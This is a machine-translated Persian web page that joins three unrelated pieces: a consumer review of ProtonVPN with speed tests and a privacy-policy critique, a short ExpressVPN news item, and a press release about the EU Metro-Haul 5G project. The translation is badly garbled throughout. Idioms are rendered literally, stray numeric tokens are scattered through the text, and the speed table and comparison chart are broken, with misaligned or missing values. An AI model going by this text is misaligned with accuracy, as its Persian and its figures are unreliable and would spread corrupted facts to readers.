برای تخفیف های خرید عمده فایده همیشه تعادل وجود دارد. ، و نوعی شمشیر دو لبه است. اگر قیمت پایه یک سرویس قبلاً نسبتاً بالا باشد ، معمولاً تخفیف عمیق برای تعهد بلند مدت نشانگر آن سرویس است که سعی دارد از تایمرهای کوتاه یا افرادی که ترجیح می دهند یک برنامه پرداخت ماهانه به ماه را دلسرد کنند. اگر خدمات قبلاً نسبتاً گران باشد ، تخفیف ناچیز انگیزه کافی برای متعهد شدن به برنامه بلند مدت نسبت به یک شرکت مشابه یا بهتر را ارائه نمی دهد. من احساس کردم که قیمت پایه ProtonVPN نسبت به قیمت رقابت آنها نسبتاً بالا است. من گمان می کنم دلیل گرانتر شدن مدل این است که مارک تجاری "Proton" با "ProtonMail" بوده است و مارکی ساخته شده است که احساس می کنند می توانند قیمت بالاتری را بدست آورند.

ProtonVPN همچنین دارای "Visionary" است. "برنامه ، با قیمتی 30 دلار در ماه (با همان 20٪ تخفیف برای یک سال خدمات با ارزش). مزایای اضافه شده استفاده از دستگاه های همزمان بیشتر در شبکه (به علاوه در حال حاضر شامل 5 عادی است که معمولاً همه دستگاه های یک کاربر را کنترل می کند) و یک حساب ایمیل ProtonMail Visionary (ممکن است شما با ProtonMail که سرویس ایمیل شرکت بوده است آشنا باشید). سرویس بینایی ProtonMail به تنهایی 24 دلار در ماه است ، بنابراین اگر می خواهید این برنامه (بسیار گران قیمت) باشد ، اگر مزایا ارزش هزینه را داشته باشند ، به عهده شما خواهد بود.

این نمی تواند یک نکته جزئی تر باشد ، اما من در این صفحه یک دکمه پشتی داشتم – "بازگشت به ProtonVPN.com" (تأکید معدن).

هنگام ثبت نام در خدمت ، شما باید یک آدرس ایمیل ارائه دهید ، که بیشترین کسی است که به حریم شخصی خود نگران است و می خواهد آن را تأمین کند. پرداخت با بیت کوین امکان پذیر است ، اما در روش های پیش فرض پرداخت هنگام ثبت نام گزینه ای ذکر نشده نیست. برای پرداخت با بیت کوین ، ابتدا باید یک حساب کاربری رایگان ایجاد کنید که احساس می کنم در طی ثبت نام بهتر می توان توضیح داد. نکته جانبی: هنوز حسابهای رایگان باید تأیید شوند (از طریق ایمیل ، پیامک یا با گزینه ی بیهوده اهدا پول اضافی برای اثبات اینکه انسان هستید.) پس از وارد کردن کد تأیید ، و کلیک بر روی دکمه "دریافت ProtonVPN" برای تکمیل ثبت نام ، سایت در آنجا نشسته است ، ظاهراً هیچ کاری نکرده است ، تا اینکه دوباره روی آن کلیک کردم و پیغام «نام کاربری قبلاً گرفته شده» را گرفتم. نمی دانم چرا فقط هدایت نشدم ، بلکه بیشتر فقط آزار دهنده بود ، و من توانستم پس از آن به صورت دستی به حساب من وارد شوید. احتمالاً این فقط یک وقفه است.

پیکربندی سرویس: پورتال کاربر ProtonVPN بسیار شهودی و کاربر پسند بود ، اما تنظیمات ، بارگیری ها و غیره در سمت چپ صفحه به وضوح برچسب خورده و در دسترس است. منوها برای حرکت ساده و طراحی زیبا بسیار ساده بودند. پیدا کردن دقیقاً آنچه را که من نیاز داشتم بسیار آسان بود.در صفحه بارگیری کاربران پورتال کاربر آنها یک ژنراتور فایل پیکربندی انواع وجود داشت ، اما تنها با چند مورد نوری با این وجود ، هنوز هم یک ویژگی خوب است ، و من خوشحال شدم که آن را اینجا دیدم. برخی از سرورهای ProtonVPN نمادی از دو فلش دارند که هر دو جهت را نشان می دهند. این نماد دارای افسانه یا ابزار مربوطه نیست ، و من فقط می توانستم به طور مشخص بدانم منظور از استفاده از ابزار بازرس مرورگر من چیست (احتمالاً می توانستم حدس بزنم ، اما این به معنای پشتیبانی P2P است). همه سرورهای ProtonVPN ظاهراً از P2P پشتیبانی نمی کنند ، که مایه تاسف است. برای ساختن آن به یکی از بهترین پورتال های کاربرانی که من دیده ام ، به لهستانی کمی در این قسمت از سایت نیاز خواهید داشت.

هنگام انتخاب سکوی خود در پورتال بارگیری ، من مخصوصاً از سایتی که مستقیماً شما را به صفحه دستورالعمل ها می بردند قدردانی کردم. . دستورالعمل بسیار آسان برای یک کاربر بی تجربه است. این بسیار عالی بود.

تست های سرعت و پایداری: سرعت روی سرورهایی که من آزمایش کردم پایدار اما ضعیف بود – سرور ایالات متحده تست شده تقریباً بالاتر از حداقل بود تا باند پهن نامیده شود ، در حالی که سرورهای بین المللی. همه نسبتاً کند بودند. توجه داشته باشید که از آنجا که ProtonVPN دارای سرورهای رایگان و سرورهای پرداخت شده است (متفاوت بودن سرعت و ظرفیت) ، تمام آزمایشات روی سرورهای پرداخت شده انجام می شود. همچنین ، تمام تست ها با استفاده از رمزگذاری AES-256 بیش از UDP اجرا می شوند.

Test Speed ​​- ProtonVPN
Latency بارگیری بارگیری
بدون VPN دادگاه 1 [ ] 30 ms 98.20 mbps 31.06 mbps
آزمایشی 2 30 ms 98.16 mbps 31.36 mbps
محاکمه 3 31 ms 98.89 mbps 30.50 mbps
میانگین 30 ms 98.42 mb 30.97 mbps
USA محاکمه 1 106 19659059] 20.57 mbps 1.29 mbps
Trial 2 108 ms 20.70 mbps 1.16 mbps
Trial 19659066] 104 ms 20.65 mbps 1.22 mbps
میانگین [19659080] 106 ms 20.64 mbps 1.22 mbps
Comp to Bench +76 ms 20.97٪ 3.95٪
]
UK محاکمه 1 283 ms 5.09 [mbps] 6.76 mbps
Trial 2 294 ms 7.76 mbps 4.71 mbps
Trial 3 284 ms ms 7.69 mbps 6.59 mbps
میانگین 287 ms 6.85 mbps 6.02 mbps
comp to Bench comp +257 ms 6.96٪ 19.44٪
Hong Kong Trial 1 332 ms 3.42 mbps 3.99 mbps
Trial 2 342 ms [19659066] 6.61 mbps 3.83 mbps
Trial 3 342 ms 6.53 mbps 3.93
mbps
میانگین ] 339 ms 5.52 mbps 3.92 mbps
Comp to Bench +308 ms 5.61٪ 12.65٪
استرالیا محاکمه 1 469 ms 4.63 mbps mbps mbps mbps
Trial 2 453 ms 4.61 mbps 1.73 mbps
Trial 3 454 ms 4.66 mbps 1.76 mbps
میانگین 459 ms 4.63 mbps 1.71 mbps
Comp to Bench + 428 ms 4.71٪ 5.52٪

گرفتن پشتیبانی: من به حمایت از برخی questio عمومی رسیدم ns و یک پاسخ در 24 ساعت دریافت کرد – که هم ساده بود و هم مفید. پیامی که من دریافت کردم احساس کنسرو احساس نمی شود ، و هیچ امضایی پف کرده یا بازاریابی کفش پوشیده وجود نداشت. قطعاً این پشتیبانی یکی از بهترین جنبه های خدمات است ، اما ظاهراً در یک منطقه زمانی اروپا (همانطور که انتظار دارید) مستقر باشد ، و این بدان معناست که پاسخ به سوالات یا نگرانی ها معمولاً هنگام خواب می رسد.

بازپرداخت: من درخواست بازپرداخت را ارسال کردم و در کمتر از 24 ساعت پاسخ دریافت کردم. این یک معامله بزرگ نبوده است ، اما برای لغو ، شما باید قبل از صدور بازپرداخت ، برنامه خود را در پرتال کاربر دوباره به حالت "رایگان" برگردانید. عجیب به نظر می رسید که آنها از انتهای آن نظارت نداشتند که بدون آن مرحله صادر کنند. من این کار را کردم و به آنها اطلاع دادم. روز بعد بازپرداخت دریافت کردم. نسبتاً بدون درد.

نگرانی در رابطه با شرایط و ضوابط / سیاست حفظ حریم خصوصی: سیاست ها و اصطلاحات نه کفایت و ظریف بودند ، بلکه در جایی میان هم قرار گرفتند. در حالی که مدت طولانی بودند ، آنها خیلی توهین آمیز نبودند.

کاری که ما هنگام استفاده از ProtonVPN انجام نمی دهیم:

  • ترافیک کاربر یا محتوای هرگونه ارتباط را وارد کنید.
  • تبعیض در برابر دستگاه ها ، پروتکل ها یا برنامه ها.
  • اتصال اینترنت خود را بریزید.

شاید این کمی گمراه کننده باشد یا حداقل شایسته توضیح باشد. لایه Free پشتیبانی P2P ندارد (می توانید استدلال كنید كه این پروتكلی است كه "از آن تبعیض آمیز است") ، اما می تواند به معنای معناشناختی بیاید.

ما از یك نصب محلی پیویك استفاده می كنیم. یک افزونه آنالیز اطلاعاتی برای حفظ حریم خصوصی است ، خوب است که در اینجا از آن استفاده کنید (بر خلاف گفته ها ، گوگل آنالیتیکس).

گزارش های اشکال بعضی اوقات به شخص ثالثی چون زندزک اعتماد می کنند.

دست ، خدمات پسندانه ای برای حفظ حریم خصوصی نیست.

پرداخت و کمکهای نقدی بیت کوین یا بیت کوین نیز پذیرفته شده است.

کاش یک اسناد کمی بیشتر در سایت وجود داشته باشد که این گزینه های پرداخت مربوط به آن باشند. بسیاری از علاقه مندان به حفظ حریم خصوصی ترجیح می دهند از این روش ها استفاده کنند ، اما من احساس می کنم آنها به شکلی واضح که ارائه نمی شود قرار داده نشده اند.

فقط کارمندان شرکت دسترسی فیزیکی یا دیگری به سرورها دارند. داده ها معمولاً در قالب رمزگذاری شده روی سرورهای ما ذخیره می شوند. تهیه نسخه پشتیبان از آفلاین ممکن است به صورت دوره ای ذخیره شود ، اما این موارد نیز امن هستند.

خوشحالم که آنها در اینجا درباره این موضوع صحبت می کنند. من فکر می کنم شفافیت شرکت ها در مورد جنبه های عملکرد خود که بسیاری از مردم ممکن است در نظر نگیرند بسیار مهم است ، اما به همان اندازه مهم است که هنگام بررسی حریم خصوصی و امنیت خود فکر کنید.

تمام برنامه ها به طور خودکار تمدید می شوند. مدت صدور صورت حساب.

من اشتراک های امتناع را دوست ندارم. تمدید خودکار آزار دهنده است ، و فکر می کنم یک بار پرداخت باید گزینه ای برای ثبت نام باشد.

شرکت هیچ گونه ضمانتی در مورد قابلیت اطمینان سرویس ارائه نمی دهد و علی رغم بهترین استفاده از امنیت داده های کاربر را تضمین نمی کند. تلاش ها. این سرویس "همانطور که هست" ارائه می شود و شما موافقت می کنید که شرکت را مسئولیت پذیر نبینید و به دنبال جبران خسارتهایی که ممکن است در نتیجه از دست دادن استفاده ، داده یا سودهای مرتبط با عملکرد سرویس یا عدم موفقیت باشد ، در نظر بگیرید. چنین عملکردی.

چرا این گفته ها (هرچند که ممکن است وجود داشته باشد) ، خیلی مرا آزار می دهد؟ من فقط از این متنفرم که وقتی شرکتی به شما بگوید خدمات آنها بسیار عالی است ، شما این گفته ها را می خوانید و این باعث می شود که من دو بار انجام دهم.

ممکن است ما محدودیت های استفاده یا خدمات را اعمال کنیم ، سرویس را به حالت تعلیق در آوریم یا مسدود کنیم. با استفاده از اختیار ما.

من می خواهم اطلاعات بیشتری راجع به چه شرایطی محدود ، معلق یا مسدود شوم. به نظر من این بسیار مبهم است.

شرکت در محدوده قانون قابل اجرا ، این حق را برای خود محفوظ می دارد که هر زمان خواست این قرارداد را بررسی و تغییر دهد. شما وظیفه دارید مرتباً این شرایط و ضوابط را مرور کنید. استفاده مداوم از خدمات پس از چنین تغییراتی رضایت شما از چنین تغییراتی را تشکیل می دهد.

درصد بسیار کمی از افرادی که از یک سرویس VPN معین استفاده می کنند ، همیشه شرایط را مطالعه می کنند. در حالی که این کار خوب است که قبل از خرید ، شرایط یک سرویس را بخوانید ، اما فکر می کنم شرکتی که به وی پستی را برای تغییر شرایط بدون اطلاع قبلی می دهد و بار سنگین را برای مشتری می گذارد تا مرتباً شرایط خدمات را مرور کند ، احمقانه است. شما یک آدرس ایمیل جمع آوری می کنید ، آیا این یک سیاستی برای ارسال یک اعلان برای این است که مردم بدانند چه چیزی و چه موقع ممکن است تغییر کند ، بیش از حد است؟

افکار نهایی: ProtonVPN یک واکنش ولرم از من گرفت. برخی از جنبه های وب سایت خود احساس ناقص یا بد فکر (فرایند ثبت نام) کرده اند. برخی دیگر احساس کاملتری دارند (داشبورد کاربر و پورتال بارگیری). در حالی که روند ثبت نام در سرویس کمی دشوار بود ، پس از اتمام این مرحله ، همه چیز از بین رفت. سرویس و پیکربندی ها به راحتی تنظیم و وصل شدند ، اما سرعت هایی که من تجربه کردم عالی نبود. پشتیبانی یکی از جنبه های بهتر خدمات بود ، زیرا آنها سریع و مفید بودند. شرایط خدمات ProtonVPN نیز در وسط قرار داشت: برخی از ابروها ، اما هیچگونه معامله کننده ای ندارند. در پایان ، (به ویژه با توجه به قیمت بالای درخواست آن) ، معتقدم خدمات بهتری در بازار موجود است.

از نمودار مقایسه VPN
CATEGORY VPN SERVICE ProtonVPN
JURISDICTION [19659247] مستقر در (کشور) سوئیس
چهارده چشم؟ تعاونی
دشمن اینترنت شماره
LOGGING Logs Traffic No [1965924S] درخواست ها
Timestamps ثبت نام ها بله
پهنای باند لاگ
IP آدرس سیاهههای مربوط
ACTIVISM روش پرداخت ناشناس

ایمیل

Bitcoin را قبول کند بله خیر
به علل حفظ حریم خصوصی باز می گردد بله
دیدار با معیارهای PrivacyTools IO معیارها بله
محافظت در برابر سرورهای DNS اول 1 بله [IP659پشتیبانی خیر
OpenVPN پیشنهادات بله
OBFUSCATION پشتیبانی از Multihop [19659252] بله
پشتیبانی از TCP Port 443
پشتیبانی از Obfsproxy
پشتیبانی از SOCKS
پشتیبانی از تونل SSL
پشتیبانی از تونل SSH
سایر پروتکل های اختصاصی
PORT BLACK ] P2P برخی
SPEEDS میانگین سرور ایالات متحده٪ 20.97
Int'l سرور متوسط٪ 5.76
سرویس دهنده اختصاصی یا مجازی [196593009] ] رمزگذاری داده پیش فرض AES-256
قویترین رمزگذاری داده ها AES-256
ضعیف ترین رمزنگاری دستی
قویترین رمزنگاری دستی [196590000] دسترسي ] # از کشورها 14
# سرورها 112
پشتیبانی لینوکس (کتابچه راهنمای کاربر) بله
وب سایت # کوکی های مداوم 0
# [ردیابهایخارجی 0
# از API های اختصاصی 1
رتبه SSL سرور A +
SSL Cert صادر شده به [19659252] خود
قیمت گذاری $ / ماه (قیمت گذاری سالانه) 8.00 $
$ / اتصال / ماه 1.60 دلار
محاکمه رایگان بازپرداخت دوره 60
ETHICS خط مشی های ضد و نقیض بله
به طور دروغ ادعا 100٪ کارآمد
Spam Spam Media Media
POLICIES Forbids Spam ] به افشای کامل نیاز دارد
AFFILIATES کپی اخلاقی را تمرین کنید
افشای کامل دهید

اگر پروژه را دوست دارید و کار من را مفید می دانید ، لطفاً اهدا کنید – کمکهای سخاوتمندانه شما برای پرداخت هزینه میزبانی ، ابزارها ، و زمان لازم است که تحقیقاتم را انجام دهم و داده ها را تازه نگه دارم.

ExpressVPN نسخه 5 به روزرسانی شده را مجاز می کند

ExpressVPN می تواند یکپارچه در دستگاه های شما – رایانه ، روتر ، تبلت یا تلفن های هوشمند کار کند. خبر جالب این است که ExpressVPN به تازگی خط مشی چند دستگاه خود را تغییر داده است تا پنج اشتراک همزمان در هر اشتراک را از سه دستگاه قبلی در هر اشتراک امکان پذیر کند.

حد قبلی سه اتصال باعث ناامیدی در بسیاری از کاربران شده است که می خواهند به همان تعداد مشترک شوند دستگاه ها همانطور که می توانستند. ExpressVPN با توجه به این دلهره از مشترکین ، این سیاست جدید را اتخاذ كرد كه تضمین می كند مشترکان بتوانند از حریم شخصی و امنیتی كه انتظار دارند در حالیكه به عنوان پنج دستگاه استفاده می كنند ، بهره ببرند.

ExpressVPN برنامه های آماده استفاده دارد كه در ویندوز كار خواهند كرد ، Mac ، iOS ، Android و Linux. مشترکین می توانند ExpressVPN را در هر دستگاه دلخواه خود نصب کنند زیرا هیچ محدودیتی برای نصب وجود ندارد بلکه فقط به پنج اتصال همزمان امکان پذیر است.

یک شبکه خصوصی مجازی یا VPN یک تونل مطمئن است که دستگاه و اینترنت شما را به هم وصل می کند. این مورد برای محافظت از ترافیک آنلاین شما از تداخل ، تعقیب و سانسور استفاده می شود.

ExpressVPN به عنوان یک پروکسی عمل می کند تا به شما امکان دهد موقعیت مکانی خود را تغییر داده یا از آن استفاده کنید و به صورت ناشناس از هر مکانی در کره زمین گشت و گذار کنید.

ExpressVPN یک سرویس شبکه خصوصی مجازی توسط Express VPN International Ltd. ، یک شرکت مستقر در جزایر ویرجین بریتانیا. نرم افزار این شرکت به عنوان ابزاری برای حفظ حریم خصوصی و امنیتی در بازار موجود است که آدرس های IP کاربر را نقاب می زند و ترافیک وب وی را رمزگذاری می کند.

یک VPN می تواند به شما در انواع مختلف کمک کند:

پروژه مترو-حمل و نقل "فوق العاده موفق" در پشتیبانی از خدمات 5G – METRO-HAUL

پروژه فوق العاده موفق "Metro-Haul" برنامه های نهایی را تحویل می گیرد و نمایش هایی را برای نشان دادن ارزش کنترل SDN از شبکه های مترو انعطاف پذیر برای پشتیبانی از خدمات 5G ارائه می دهد

نشست پیزا پروژه بودجه اتحادیه اروپا به میزبانی اریکسون Telecomunicazioni و CNIT [19659003] پیزا ، ایتالیا ، 31 اکتبر 2019 – 28 ماه از زمان اجرای 3 ساله خود ، نمایندگان 21 سازمان شریک در پیزا برای برنامه ریزی مراحل نهایی پروژه Metro-Haul ملاقات کردند. پیزا خانه دو عضو کنسرسیوم (Ericsson Telecomunicazioni و Consorzio Nazionale Interuniversitario Per Le Telecomunicazioni (CNIT)) است و آنها با مهربانی میزبان این نشست بودند.

Metro-Haul یک برنامه تحقیق و نوآوری اتحادیه اروپا Horizon 2020 است. تلاش برای طراحی و ایجاد زیرساخت های هوشمند نوری مترو قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به ظرفیت پیش بینی شده ظرفیت و ویژگیهای خاص آن ، مانند تحرک ، تأخیر کم ، کم لرزه و غیره است. خدمات و استفاده از موارد با تأکید ویژه بر خدمات صنایع مختلف عمودی تا فناوری اطلاعات و ارتباطات.

این پروژه به تازگی بررسی پروژه دوم سال خود را انجام داده كه در آن زمان كار تاكنون به عنوان برجسته ارزیابی شده است ، و موفقیت فوق العاده ای از طریق انبوه آن ثبت شده است. تأثیر در انتشار و استاندارد سازی. در مدت زمان بیش از دو سال ، این پروژه بیش از 170 مقاله را در مجلات و رویه های کنفرانس منتشر کرده است. مقالات و وبلاگ پروژه را می توان در وب سایت آن به آدرس https://www.metro-haul.eu/.ociation19659005 با توجه یافتن فن آوری جدید شبکه 5G طیف گسترده ای از خدمات جدید را تسهیل می کند که به طور بنیادی تغییر خواهد کرد کاربران اینترنت را تجربه می کنند ، "گفت: آنتونیو D'Errico ، محقق ارشد Ericsson Telecomunicazioni. "این اتصال دستگاه های هوشمند از جمله در وسایل نقلیه خودمختار را تسهیل می کند ، و برنامه های مشترک بین کاربران را هنگام حرکت در زندگی آنها تسهیل می کند."

"اریکسون از بخشی از پروژه Metro-Haul خوشحال است." . "ما در بسیاری از فن آوری های لازم برای ساختن یک شبکه 5G پایان به کار متخصص هستیم و ضروری است که ما نقش موثری در تحقیقات پیشرو در مورد نحوه ساخت و استقرار این شبکه ها داشته باشیم."

فیلیپو کوگینی ، مدیر CNIT در Metro گفت: "CNIT یک کنسرسیوم غیر انتفاعی است که در سال 1995 تاسیس شده و 37 دانشگاه عمومی ایتالیا را برای انجام فعالیت های تحقیقاتی ، نوآوری و آموزش / آموزش در زمینه فناوری اطلاعات و ارتباطات گرد هم آورده است." حمل و نقل. "یکی از پنج آزمایشگاه ملی ما در پیزا واقع شده است و ما در شبکه ها و فن آوری های فوتونیک تخصص داریم."

"CNIT توسعه دهنده پیشرو تجهیزات نوری پیشرفته است ، و ما خوشحالیم که ROADM ها و ماتریس های سوئیچینگ ما به عنوان هسته استفاده می شوند. مؤلفه های سناریوهای تظاهرات مترو-هال ، "فیلیپو توضیح داد. "این تظاهرات ها برای تعیین ارزش Metro-Haul و اثبات اینكه طیف گسترده ای از فن آوری های تولید شده توسط شرکاء می توانند برای ارائه خدمات واقعی در شبکه های واقعی ادغام شوند ، مهم است."

این مجامع برای پروژه بسیار مهم بوده است. زیرا بیش از 40 نفر را از سراسر اروپا گرد هم آورده اند تا جزئیات تظاهرات را نهایی کنند. سناریوهایی که نمایش داده می شود ، پیچیده است و بحث های این هفته بسیار شدید بوده است ، اما پیشرفت مهم زیادی انجام شده است و ما اطمینان داریم که قادر خواهیم بود شبکه های عملیاتی معتبر را قبل از پایان پروژه در تابستان 2020 نشان دهیم.

درباره Metro-Haul

که در اواسط سال 2017 راه اندازی شد ، پروژه Metro-Haul بودجه (GA 761727) از برنامه تحقیق و نوآوری Horizon 2020 اتحادیه اروپا دریافت می کند. هدف از این پروژه 7.7 میلیون یورو طراحی و ساخت زیرساخت هوشمند مترو نوری است که قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به افزایش ظرفیت پیش بینی شده و ویژگی های خاص آن از جمله تحرک ، تأخیر کم و جهش کم است. این زیرساخت همچنین از خدمات گسترده ای پشتیبانی خواهد کرد و از موارد خاص با تأکید ویژه بر خدمات صنایع مختلف به صورت عمرانی و فناوری اطلاعات و ارتباطات پشتیبانی خواهد کرد.

وب سایت: https://metro-haul.eu
توییتر: MetroHaul
Linked-In: https://www.linkedin.com/groups/13543287 موفق19459010LOADResearchGate: https://www.researchgate.net/project/Metro-Haulociation19659015]